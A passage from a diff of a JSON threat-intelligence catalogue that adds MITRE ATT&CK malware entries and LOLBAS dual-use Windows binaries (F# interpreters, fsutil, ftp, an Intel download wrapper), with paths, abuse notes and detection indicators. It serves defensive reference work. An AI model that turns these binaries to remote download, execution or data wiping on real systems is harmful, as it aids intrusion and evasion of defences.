"3a05085e-5a1f-4a74-b489-d679b80e2c18", + "value": "FruitFly" + }, + { + "description": "[[Fsi.exe - LOLBAS Project](/references/4e14e87f-2ad9-4959-8cb2-8585b67931c0)]", + "meta": { + "id": "782590b4-0cc8-45bc-8e64-1960e42d68e9", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "f2a5e6cb-75fd-4108-9466-80471c7d0422", + "type": "similar" + } + ], + "uuid": "33c9b15d-da72-49ab-b5a3-918c93ea5208", + "value": "Fsi.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* C:\\Program Files\\dotnet\\sdk\\[sdk version]\\FSharp\\fsi.exe\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsi.exe\n\n**Resources:**\n* [https://twitter.com/NickTyrer/status/904273264385589248](https://twitter.com/NickTyrer/status/904273264385589248)\n* [https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/](https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/)\n\n**Detection:**\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Fsi.exe execution may be suspicious on non-developer machines\n* Sigma: [proc_creation_win_lolbin_fsharp_interpreters.yml](https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml)[[Fsi.exe - LOLBAS Project](/references/4e14e87f-2ad9-4959-8cb2-8585b67931c0)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5222", + "source": "Tidal Cyber", + "tags": [ + "7a4b56fa-5419-411b-86fe-68c9b0ddd3c5", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "ca93af75-0ffa-4df4-b86a-92d4d50e496e", + "type": "used-by" + }, + { + "dest-uuid": "33c9b15d-da72-49ab-b5a3-918c93ea5208", + "type": "similar" + } + ], + "uuid": "f2a5e6cb-75fd-4108-9466-80471c7d0422", + "value": "Fsi" + }, + { + "description": "[[FsiAnyCpu.exe - LOLBAS Project](/references/87031d31-b6d7-4860-b11b-5a0dc8774d92)]", + "meta": { + "id": "8a4048e4-028a-434b-bb75-edac8aefe948", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "9e5c41bb-f4cc-4132-8c7a-4a10a006190b", + "type": "similar" + } + ], + "uuid": "0c8284cf-4e6f-4660-9381-76c08e0a6244", + "value": "FsiAnyCpu.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** 32/64-bit FSharp (F#) Interpreter included with Visual Studio.\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsianycpu.exe\n\n**Resources:**\n* [https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/](https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/)\n\n**Detection:**\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines\n* Sigma: [proc_creation_win_lolbin_fsharp_interpreters.yml](https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml)[[FsiAnyCpu.exe - LOLBAS Project](/references/87031d31-b6d7-4860-b11b-5a0dc8774d92)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5223", + "source": "Tidal Cyber", + "tags": [ + "c5d1a687-8a36-4995-b8cb-415f33661821", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "0c8284cf-4e6f-4660-9381-76c08e0a6244", + "type": "similar" + } + ], + "uuid": "9e5c41bb-f4cc-4132-8c7a-4a10a006190b", + "value": "FsiAnyCpu" + }, + { + "description": "[[Fsutil.exe - LOLBAS Project](/references/e2305dac-4245-4fac-8813-69cb210e9cd3)]", + "meta": { + "id": "0d16f928-f08a-450b-8980-60f0e13abf2a", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "7a829dae-00cf-4321-95b4-276f7dfb5368", + "type": "similar" + } + ], + "uuid": "142b3451-bb26-4bb2-8d22-58cccd0f52ee", + "value": "Fsutil.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** File System Utility\n\n**Author:** Elliot Killick\n\n**Paths:**\n* C:\\Windows\\System32\\fsutil.exe\n* C:\\Windows\\SysWOW64\\fsutil.exe\n\n**Resources:**\n* [https://twitter.com/0gtweet/status/1720724516324704404](https://twitter.com/0gtweet/status/1720724516324704404)\n\n**Detection:**\n* IOC: fsutil.exe should not be run on a normal workstation\n* IOC: file setZeroData (not case-sensitive) in the process arguments\n* IOC: Sysmon Event ID 1\n* IOC: Execution of process fsutil.exe with trace decode could be suspicious\n* IOC: Non-Windows netsh.exe execution\n* Sigma: [proc_creation_win_susp_fsutil_usage.yml](https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml)[[Fsutil.exe - LOLBAS Project](/references/e2305dac-4245-4fac-8813-69cb210e9cd3)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5112", + "source": "Tidal Cyber", + "tags": [ + "76bb7541-94da-4d66-9a57-77f788330287", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "142b3451-bb26-4bb2-8d22-58cccd0f52ee", + "type": "similar" + } + ], + "uuid": "7a829dae-00cf-4321-95b4-276f7dfb5368", + "value": "Fsutil" + }, + { + "description": "", + "meta": { + "id": "e512e0ec-ff37-49ef-ac82-3b6892f3ebd2" + }, + "related": [ + { + "dest-uuid": "062deac9-8f05-44e2-b347-96b59ba166ca", + "type": "similar" + } + ], + "uuid": "4cce70d6-bf60-4943-9342-a9f3f306aea0", + "value": "ftp.exe" + }, + { + "description": "[ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.[[Microsoft FTP](https://app.tidalcyber.com/references/970f8d16-f5b7-44e2-b81f-738b931c60d9)][[Linux FTP](https://app.tidalcyber.com/references/021ea6bc-abff-48de-a6bb-315dbbfa6147)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0095", + "source": "MITRE", + "tags": [ + "95d37388-4e95-4d7f-96ba-99d94c842299", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", + "8bf128ad-288b-41bc-904f-093f4fdde745" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "a80c00b2-b8b6-4780-99bb-df8fe921947d", + "type": "used-by" + }, + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "type": "used-by" + }, + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "cf23bf4a-e003-4116-bbae-1ea6c558d565", + "type": "similar" + }, + { + "dest-uuid": "4cce70d6-bf60-4943-9342-a9f3f306aea0", + "type": "similar" + } + ], + "uuid": "062deac9-8f05-44e2-b347-96b59ba166ca", + "value": "ftp" + }, + { + "description": "[FunnyDream](https://app.tidalcyber.com/software/d0490e1d-8287-44d3-8342-944d1203b237) is a backdoor with multiple components that was used during the [FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) campaign since at least 2019, primarily for execution and exfiltration.[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1044", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "be25c1c0-1590-4219-a3d5-6f31799d1d1b", + "type": "similar" + } + ], + "uuid": "d0490e1d-8287-44d3-8342-944d1203b237", + "value": "FunnyDream" + }, + { + "description": "[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", + "meta": { + "id": "9b823ac5-5613-4665-a62e-5635e951e8ba" + }, + "related": [ + { + "dest-uuid": "be9a2ae5-373a-4dee-9c1e-b54235dafed0", + "type": "similar" + } + ], + "uuid": "b9e7470c-e179-4efd-b472-ba146d8cf8fa", + "value": "DILLJUICE stage2" + }, + { + "description": "[FYAnti](https://app.tidalcyber.com/software/be9a2ae5-373a-4dee-9c1e-b54235dafed0) is a loader that has been used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) since at least 2020, including to deploy [QuasarRAT](https://app.tidalcyber.com/software/4bab7c2b-5ec4-467e-8df4-f2e6996e136b).[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0628", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "434ba392-ebdc-488b-b1ef-518deea65774", + "type": "similar" + }, + { + "dest-uuid": "b9e7470c-e179-4efd-b472-ba146d8cf8fa", + "type": "similar" + } + ], + "uuid": "be9a2ae5-373a-4dee-9c1e-b54235dafed0", + "value": "FYAnti" + }, + { + "description": "[Fysbis](https://app.tidalcyber.com/software/317a7647-aee7-4ce1-a8f8-33a61190f55d) is a Linux-based backdoor used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) that dates back to at least 2014.[[Fysbis Palo Alto Analysis](https://app.tidalcyber.com/references/3e527ad6-6b56-473d-8178-e1c3c14f2311)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0410", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "50d6688b-0985-4f3d-8cbe-0c796b30703b", + "type": "similar" + } + ], + "uuid": "317a7647-aee7-4ce1-a8f8-33a61190f55d", + "value": "Fysbis" + }, + { + "description": "The term WhiteBear is used both for the activity group (a subset of G0010) as well as the malware observed. Based on similarities in behavior and C2, WhiteBear is assessed to be the same as S0168. [[Securelist WhiteBear Aug 2017](https://app.tidalcyber.com/references/44626060-3d9b-480e-b4ea-7dac27878e5e)][[ESET Crutch December 2020](https://app.tidalcyber.com/references/8b2f40f5-7dca-4edf-8314-a8f5bc4831b8)]", + "meta": { + "id": "7305624a-c600-4135-a190-b558e98e1810" + }, + "related": [ + { + "dest-uuid": "7a60b984-b0c8-4acc-be24-841f4b652872", + "type": "similar" + } + ], + "uuid": "24e22e4a-0c90-48e6-94ed-f212b21f7212", + "value": "WhiteBear" + }, + { + "description": "[Gazer](https://app.tidalcyber.com/software/7a60b984-b0c8-4acc-be24-841f4b652872) is a backdoor used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) since at least 2016. [[ESET Gazer Aug 2017](https://app.tidalcyber.com/references/9d1c40af-d4bc-4d4a-b667-a17378942685)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0168", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "76abb3ef-dafd-4762-97cb-a35379429db4", + "type": "similar" + }, + { + "dest-uuid": "24e22e4a-0c90-48e6-94ed-f212b21f7212", + "type": "similar" + } + ], + "uuid": "7a60b984-b0c8-4acc-be24-841f4b652872", + "value": "Gazer" + }, + { + "description": "[[ESET Gelsemium June 2021](https://app.tidalcyber.com/references/ea28cf8c-8c92-48cb-b499-ffb7ff0e3cf5)]", + "meta": { + "id": "0ae9e896-aee3-44bf-b53d-2b4556620f27" + }, + "related": [ + { + "dest-uuid": "9a117508-1d22-4fea-aa65-db670c13a5c9", + "type": "similar" + } + ], + "uuid": "b270fcf2-72ea-41c5-89fe-addb6cefd547", + "value": "Gelsevirine" + }, + { + "description": "[[ESET Gelsemium June 2021](https://app.tidalcyber.com/references/ea28cf8c-8c92-48cb-b499-ffb7ff0e3cf5)]", + "meta": { + "id": "6add24ca-d391-4416-8283-c7bb5f8209c6" + }, + "related": [ + { + "dest-uuid": "9a117508-1d22-4fea-aa65-db670c13a5c9", + "type": "similar" + } + ], + "uuid": "86499f47-083e-47a5-ad8c-032f54f26359", + "value": "Gelsenicine" + }, + { + "description": "[[ESET Gelsemium June 2021](https://app.tidalcyber.com/references/ea28cf8c-8c92-48cb-b499-ffb7ff0e3cf5)]", + "meta": { + "id": "8a9e7456-838a-4c38-99f8-385d82e1a549" + }, + "related": [ + { + "dest-uuid": "9a117508-1d22-4fea-aa65-db670c13a5c9", + "type": "similar" + } + ], + "uuid": "2f00732c-43a7-4253-a5eb-990d8466eb01", + "value": "Gelsemine" + }, + { + "description": "[Gelsemium](https://app.tidalcyber.com/software/9a117508-1d22-4fea-aa65-db670c13a5c9) is a modular malware comprised of a dropper (Gelsemine), a loader (Gelsenicine), and main (Gelsevirine) plug-ins written using the Microsoft Foundation Class (MFC) framework. [Gelsemium](https://app.tidalcyber.com/software/9a117508-1d22-4fea-aa65-db670c13a5c9) has been used by the Gelsemium group since at least 2014.[[ESET Gelsemium June 2021](https://app.tidalcyber.com/references/ea28cf8c-8c92-48cb-b499-ffb7ff0e3cf5)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0666", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "efa7c4d6-8e30-41d9-a8fd-26dc337f4a1b", + "type": "similar" + }, + { + "dest-uuid": "b270fcf2-72ea-41c5-89fe-addb6cefd547", + "type": "similar" + }, + { + "dest-uuid": "86499f47-083e-47a5-ad8c-032f54f26359", + "type": "similar" + }, + { + "dest-uuid": "2f00732c-43a7-4253-a5eb-990d8466eb01", + "type": "similar" + } + ], + "uuid": "9a117508-1d22-4fea-aa65-db670c13a5c9", + "value": "Gelsemium" + }, + { + "description": "[GeminiDuke](https://app.tidalcyber.com/software/97f32f68-dcd2-4f80-9967-cc87305dc342) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) from 2009 to 2012. [[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0049", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "199463de-d9be-46d6-bb41-07234c1dd5a6", + "type": "similar" + } + ], + "uuid": "97f32f68-dcd2-4f80-9967-cc87305dc342", + "value": "GeminiDuke" + }, + { + "description": "[Get2](https://app.tidalcyber.com/software/a997aaaf-edfc-4489-80a9-3f8d64545de1) is a downloader written in C++ that has been used by [TA505](https://app.tidalcyber.com/groups/b3220638-6682-4a4e-ab64-e7dc4202a3f1) to deliver [FlawedGrace](https://app.tidalcyber.com/software/c558e948-c817-4494-a95d-ad3207f10e26), [FlawedAmmyy](https://app.tidalcyber.com/software/308dbe77-3d58-40bb-b0a5-cd00f152dc60), Snatch and [SDBbot](https://app.tidalcyber.com/software/046bbd0c-bff5-46fc-9028-cbe46a9f8ec5).[[Proofpoint TA505 October 2019](https://app.tidalcyber.com/references/711ea2b3-58e2-4b38-aa71-877029c12e64)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0460", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "099ecff2-41b8-436d-843c-038a9aa9aa69", + "type": "similar" + } + ], + "uuid": "a997aaaf-edfc-4489-80a9-3f8d64545de1", + "value": "Get2" + }, + { + "description": "[[GfxDownloadWrapper.exe - LOLBAS Project](/references/5d97b7d7-428e-4408-a4d3-00f52cf4bf15)]", + "meta": { + "id": "068e3fc4-d5e4-436b-acf2-3db65c7a7166", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "a83cfdbf-023a-4874-a3d8-9674149ceb53", + "type": "similar" + } + ], + "uuid": "396335cb-1404-44f1-9d73-387e468bc781", + "value": "GfxDownloadWrapper.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.\n\n**Author:** Jesus Galvez\n\n**Paths:**\n* c:\\windows\\system32\\driverstore\\filerepository\\64kb6472.inf_amd64_3daef03bbe98572b\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_comp.inf_amd64_0e9c57ae3396e055\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_comp.inf_amd64_209bd95d56b1ac2d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_comp.inf_amd64_3fa2a843f8b7f16d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_comp.inf_amd64_85c860f05274baa0\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_comp.inf_amd64_f7412e3e3404de80\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_comp.inf_amd64_feb9f1cf05b0de58\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_component.inf_amd64_0219cc1c7085a93f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_component.inf_amd64_df4f60b1cae9b14a\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dc_comp.inf_amd64_16eb18b0e2526e57\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dc_comp.inf_amd64_1c77f1231c19bc72\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dc_comp.inf_amd64_31c60cc38cfcca28\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dc_comp.inf_amd64_82f69cea8b2d928f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_0606619cc97463de\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_0e95edab338ad669\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_22aac1442d387216\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_2461d914696db722\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_29d727269a34edf5\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_2caf76dbce56546d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_353320edb98da643\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_4ea0ed0af1507894\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_56a48f4f1c2da7a7\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_64f23fdadb76a511\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_668dd0c6d3f9fa0e\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_6be8e5b7f731a6e5\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_6dad7e4e9a8fa889\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_6df442103a1937a4\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_767e7683f9ad126c\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_8644298f665a12c4\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_868acf86149aef5d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_92cf9d9d84f1d3db\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_93239c65f222d453\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_9de8154b682af864\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_a7428663aca90897\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_ad7cb5e55a410add\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_afbf41cf8ab202d7\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_d193c96475eaa96e\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_db953c52208ada71\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_e7523682cc7528cc\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_e9f341319ca84274\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_f3a64c75ee4defb7\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch.inf_amd64_f51939e52b944f4b\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch_comp.inf_amd64_4938423c9b9639d7\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\\\n* c:\\windows\\system32\\driverstore\\filerepository\\cui_dch_comp.inf_amd64_deecec7d232ced2b\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_01ee1299f4982efe\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_02edfc87000937e4\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_0541b698fc6e40b0\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_0707757077710fff\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_0b3e3ed3ace9602a\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_0cff362f9dff4228\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_16ed7d82b93e4f68\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_1a33d2f73651d989\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_1aca2a92a37fce23\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_1af2dd3e4df5fd61\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_1d571527c7083952\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_23f7302c2b9ee813\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_24de78387e6208e4\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_250db833a1cd577e\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_25e7c5a58c052bc5\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_28d80681d3523b1c\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_2dda3b1147a3a572\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_31ba00ea6900d67d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_329877a66f240808\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_42af9f4718aa1395\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_4645af5c659ae51a\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_48c2e68e54c92258\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_48e7e903a369eae2\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_491d20003583dabe\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_4b34c18659561116\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_51ce968bf19942c2\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_555cfc07a674ecdd\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_561bd21d54545ed3\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_579a75f602cc2dce\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_57f66a4f0a97f1a3\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_587befb80671fb38\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_62f096fe77e085c0\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_6ae0ddbb4a38e23c\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_6bb02522ea3fdb0d\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_6d34ac0763025a06\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_712b6a0adbaabc0a\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_78b09d9681a2400f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_842874489af34daa\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_88084eb1fe7cebc3\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_89033455cb08186f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_8a9535cd18c90bc3\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_8c1fc948b5a01c52\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_9088b61921a6ff9f\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_90f68cd0dc48b625\\\n* c:\\windows\\system32\\driverstore\\filerepository\\igdlh64.inf_amd64_95cb371d046d4b4c\\\n* 